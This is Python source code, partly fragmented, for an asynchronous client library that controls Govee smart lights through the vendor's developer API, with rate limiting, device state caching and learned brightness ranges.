{self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as ex:", "err async def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[", "import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, )", "val > self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\"", ") _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES", "result = await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async", ") await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down from this", "value {brightness}, allowed range 0 .. 254\" else: if brightness > 0 and", ") if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is assumed. If", "bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {}", "with one element if \"online\" in prop: prop_online = prop[\"online\"] is True elif", "f\"set_color: invalid value {color}, must be tuple with (r, g, b) values\" else:", "elif green < 0 or green > 255: err = f\"set_color: invalid value", "def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool,", "dataclass from datetime import datetime from events import Events from typing import Any,", "GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return success and error message.\"\"\"", "async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200: device.lock_set_until", "= learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create", "not prop_online: if self.config_offline_is_off is not None: # global option if self.config_offline_is_off: prop_power_state", "# do we have requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do we", "= True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses", "color temperature to 2000-9000.\"\"\" success = False err = None device_str, device =", "GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return device @property def", "reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate", "to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls,", "below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter threshold {val} must", "learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] =", "== 200: result = await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached()", "{} self._rate_limit_on = 5 # safe available call count for multiple processes self._limit", "bool power_state: bool brightness: int color: Tuple[int, int, int] color_temp: int timestamp: int", "def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {}", "-> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str, device = self._get_device(device)", "if not device: err = f\"Invalid device {device_str}, {device}\" else: if len(color) !=", "room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the", "need to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create(", "> 255: err = f\"set_color: invalid value {color}, green must be within 0", "else: if brightness < 0 or brightness > 254: err = f\"set_brightness: invalid", "_is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks if it is a", "Tuple[int, int, int] color_temp: int timestamp: int source: str error: str lock_set_until: int", "DTO \"\"\" device: str model: str device_name: str controllable: bool retrievable: bool support_cmds:", "{json_obj}, resulting state object: {result}\" ) else: errText = await response.text() err =", "config_offline_is_off=config_offline_is_off ) else: result = await response.text() err = f\"API-Error {response.status}: {result}\" #", "number of requests remaining in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\"", "9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command =", "rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow()", "limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and", "__aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session = None", "f\"API-Result wrong: {result}\" else: result = await response.text() err = f\"API-Error {response.status}: {result}\"", "= self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit}", "also utilize the govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in", "auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get(", "with request_lambda() as response: self._set_online(True) # we got something, so we are online", "limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls", "math from contextlib import asynccontextmanager from dataclasses import dataclass from datetime import datetime", "err = \"error from aiohttp: %s\" % repr(ex) except Exception as ex: err", "error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) ->", ") limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying to get rate", "item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0, 0,", "something, so we are online self._track_rate_limit(response) # return the async content manager response", "{color}, red must be within 0 .. 254\" ) elif green < 0", "254 await self._learn(device) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp =", "cache: {result}, next state for {device.device} from api allowed in {seconds_locked} seconds\" )", "= {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status", "= ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS )", "import logging import time import math from contextlib import asynccontextmanager from dataclasses import", "+ err) def _utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\" return", "{command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while", "success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state =", "return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning(", "as offline for device in self.devices: device.online = False async def check_connection(self) ->", "f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000 or color_temp > 9000:", "else: errText = await response.text() err = f\"API-Error {response.status}: {errText}\" return result, err", "+ \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE", "status \"\"\" err = None await self.rate_limit_delay() try: async with request_lambda() as response:", "from learning, or False by default. False: an offline device doesn't change power", "command = \"turn\" params = onOff result, err = await self._control(device, command, params)", "int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning config, possibly overridden", "device = self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else:", "to return state, return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif", "is shown as off. \"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]:", "for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async def", "lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _,", "self.events = Events() self._api_key = api_key self._devices = {} self._rate_limit_on = 5 #", "on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked =", "from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from", "= brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness", "= 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage if not", "json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one element if \"online\" in", "err = None async with self._api_get(url=_API_PING, auth=False) as response: result = await response.text()", "* 1000) if response.status == 200: if \"Pong\" == result: ping_ok_delay = max(1,", "if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source =", "power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max,", "0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err = await", ") -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False err", "limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices", "and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we don't sleep await", "_LOGGER.warning(\"error getting state for device %s: %s\", device_str, err, ) self._devices[device_str].error = err", "while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked", "from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await self._get_device_state(device_str) if", "source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on:", "0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254))", "cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status", "if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100", "auth=False) as response: result = await response.text() delay = int((time.time() - start) *", "= await response.text() err = f\"API-Error {response.status}: {result}\" # cache last get_devices result", "config_offline_is_off: bool # this is the learning config, possibly overridden by a global", "not device: err = f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000", "lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err", "err = f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\" else: if", "\"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await", "the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\"", "+ \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The", "support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state: bool brightness: int color:", "default. False: an offline device doesn't change power state. True: an offline device", "0-100 up to 0-254 prop_brightness = math.floor( prop_brightness * 254 / 100 )", "when rate limiting is active.\"\"\" # do we have requests left? if self.rate_limit_remaining", "%s uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max", "# load learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max =", "control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class", "lst = [] for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device)", "learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False # init", "Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err = None device_str,", "@property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def", "self.devices: device.online = False async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\"", "> 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command", "API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return", "await self._control(device, command, command_color) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp", "prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned", "self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get", "global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is", "API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of", "err = f\"API-Result wrong: {result}\" else: result = await response.text() err = f\"API-Error", "support_color: bool support_color_tem: bool online: bool power_state: bool brightness: int color: Tuple[int, int,", "not self._learning_storage: # use an internal learning storage as long as we run.", "else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an", "= prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off is", "within 0 .. 254\" elif blue < 0 or blue > 255: err", "self._devices[device_str] = state self._devices[device_str].error = None return self.devices async def _get_device_state( self, device:", "result, err = await self._control(device, command, command_color) if not err: success = self._is_success_result_message(result)", "govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def", "{device_str}\" elif not device.retrievable: # device {device_str} isn't able to return state, return", "100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device)", "lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager async", "\"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session = None def __init__(", "self._session.close() self._session = None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] =", "unknown devices elif isinstance(device, str) and device_str in self._devices: device = self._devices[device_str] else:", "work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control( device,", "color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success =", "None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid", "False by default. False: an offline device doesn't change power state. True: an", "device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100", "config, possibly overridden by a global config class GoveeError(Exception): \"\"\"Base Exception thrown from", "with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp = self._utcnow() json_obj", "= None self._learning_storage = learning_storage if not self._learning_storage: # use an internal learning", "await self._learning_storage._read_cached() changed = False # init Dict and entry for device if", "{device_str} isn't able to return state, return 'history' state self._devices[device_str].source = \"history\" result", "-> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd", "before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice(", "work if we don't sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set", "brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 =", "bool support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state: bool brightness: int", "with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online =", "_LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES =", "config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val:", "command = \"colorTem\" result, err = await self._control(device, command, color_temp) if not err:", "= f\"Invalid device {device_str}, {device}\" else: if len(color) != 3: err = f\"set_color:", "device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and prop_brightness > 100 ):", "online: bool power_state: bool brightness: int color: Tuple[int, int, int] color_temp: int timestamp:", "False except Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if", "@property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time", "event on change.\"\"\" if self._online != online: self._online = online # inform about", "_LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await", "counted down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\"", "self.turn_on(device) # api doesn't work if we don't sleep await asyncio.sleep(1) # set", "datetime import datetime from events import Events from typing import Any, List, Optional,", "utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if", "= prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp =", "_LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not", "@asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\"", "asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with", "\"\"\"Rate limit is counted down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self):", "prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"]", "requests remaining in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The", "200: if \"Pong\" == result: ping_ok_delay = max(1, delay) else: err = f\"API-Result", "be in range 0-255 \"\"\" success = False err = None device_str, device", "f\"set_color: invalid value {color}, blue must be within 0 .. 254\" else: command", "self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state", "\" + err) def _utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\"", "Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you want to use this", "from aiohttp: %s\" % repr(ex) except Exception as ex: err = \"unknown error:", "self._session: await self._session.close() self._session = None def __init__( self, api_key: str, *, learning_storage:", "Tuple[bool, str]: \"\"\"Set color (r, g, b) where each value may be in", "= 0 return seconds_lock async def _control( self, device: Union[str, GoveeDevice], command: str,", "device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice", "= prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source =", "self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining,", "params=params ) ) as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API", "def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks if it is", "device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def", "if learning_infos == None: learning_infos = {} if device.device not in learning_infos: learning_infos[device.device]", "self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result},", "set brightness as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0", "model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in", "we don't sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness", "= \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL", "0-255 \"\"\" success = False err = None device_str, device = self._get_device(device) if", "__aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self,", "device: Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led", "_utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self,", "with 0-100 range if \"API-Error 400\" in err: # Unsupported Cmd Value #", "in result and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) ->", "seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another", "Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r,", "time import math from contextlib import asynccontextmanager from dataclasses import dataclass from datetime", "( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for", "= \"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue} result, err =", "prop_power_state = False prop_brightness = False prop_color = (0, 0, 0) prop_color_temp =", "or blue > 255: err = f\"set_color: invalid value {color}, blue must be", "all HTTP calls. This also handles: - rate-limiting - online/offline status \"\"\" err", "= brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err = await self._control(device,", "str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str,", "change self.events.online(self._online) if not online: # show all devices as offline for device", "return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\"", "disallow unknown devices elif isinstance(device, str) and device_str in self._devices: device = self._devices[device_str]", "> 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we don't", "not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break;", "if response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until =", "in range 0-255 \"\"\" success = False err = None device_str, device =", "str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time()", "an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers", "online/offline status \"\"\" err = None await self.rate_limit_delay() try: async with request_lambda() as", "higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max", "\"\"\"Remaining calls that trigger rate limiting. Defaults to 5, which means there is", "\"\"\"Govee API client package.\"\"\" import asyncio import logging import time import math from", "as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -=", "= \"brightness\" result, err = await self._control(device, command, brightness_set) if err: # try", "\"\"\" Govee Device DTO \"\"\" device: str model: str device_name: str controllable: bool", "device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"],", "isn't able to return state, return 'history' state self._devices[device_str].source = \"history\" result =", "limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call", "shown as off. \"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached", "{self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying to", "at which the current rate limit window resets in UTC epoch seconds. #", "to max once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max", "turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return success", "command_color = {\"r\": red, \"g\": green, \"b\": blue} result, err = await self._control(device,", "\"\"\"Cached devices list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev]) return lst", "Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success", "rate limit window resets in UTC epoch seconds. # return state from hisory", "lst def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device =", "0 or blue > 255: err = f\"set_color: invalid value {color}, blue must", "in self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for", "up to 0-254 prop_brightness = math.floor( prop_brightness * 254 / 100 ) result", "params = onOff result, err = await self._control(device, command, params) success = False", "1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model: str", "self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close()", "now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status", "start) * 1000) if response.status == 200: if \"Pong\" == result: ping_ok_delay =", "0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed", "== 100: _LOGGER.info( \"brightness range for %s is assumed. If the brightness slider", "\"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json )", "self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage", "= f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices = devices return", "in self.devices: device.online = False async def check_connection(self) -> bool: \"\"\"Check connection to", "manager exit.\"\"\" if self._session: await self._session.close() self._session = None def __init__( self, api_key:", "None # disallow unknown devices elif isinstance(device, str) and device_str in self._devices: device", "= self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff", "err else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices async def _get_device_state(", "not send another control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS =", "device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\")", "Events from typing import Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__", "self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is", "devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\"", "timestamp: int source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max:", "import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL", "return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks", "\"H6104\": before_set_brightness_turn_on = True # load learned/configured values if device_str in learning_infos: learning_info", "if it is a success result.\"\"\" return \"message\" in result and result[\"message\"] ==", "changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async", "handling all HTTP calls. This also handles: - rate-limiting - online/offline status \"\"\"", "str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async", "= api_key self._devices = {} self._rate_limit_on = 5 # safe available call count", "brightness_result = brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 = max(1,", "config_offline_is_off from learning, or False by default. False: an offline device doesn't change", "None async with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result = await", "elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop:", "bool): \"\"\" Set global behavour when device is offline. None: default, use config_offline_is_off", "> 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\"", "{result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache", "error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to get utc now as", "bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}:", "= True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET", "await self._session.close() self._session = None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage]", "err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by", "in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"],", "as off. \"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices", "True: an offline device is shown as off. \"\"\" self._config_offline_is_off = val @property", "as ex: err = \"unknown error: %s\" % repr(ex) if err: class error_response:", "thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\"", "not online: # show all devices as offline for device in self.devices: device.online", "100: _LOGGER.info( \"brightness range for %s is assumed. If the brightness slider doesn't", ") -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str, device =", "= brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100", "bool support_color_tem: bool online: bool power_state: bool brightness: int color: Tuple[int, int, int]", "returns: device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str = device.device", "list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self,", "def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method", "seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock = 0 return", "{device_str}: {cmd}\") result = None err = None if not device: err =", "response.json() prop_online = False prop_power_state = False prop_brightness = False prop_color = (0,", "if color_temp < 2000 or color_temp > 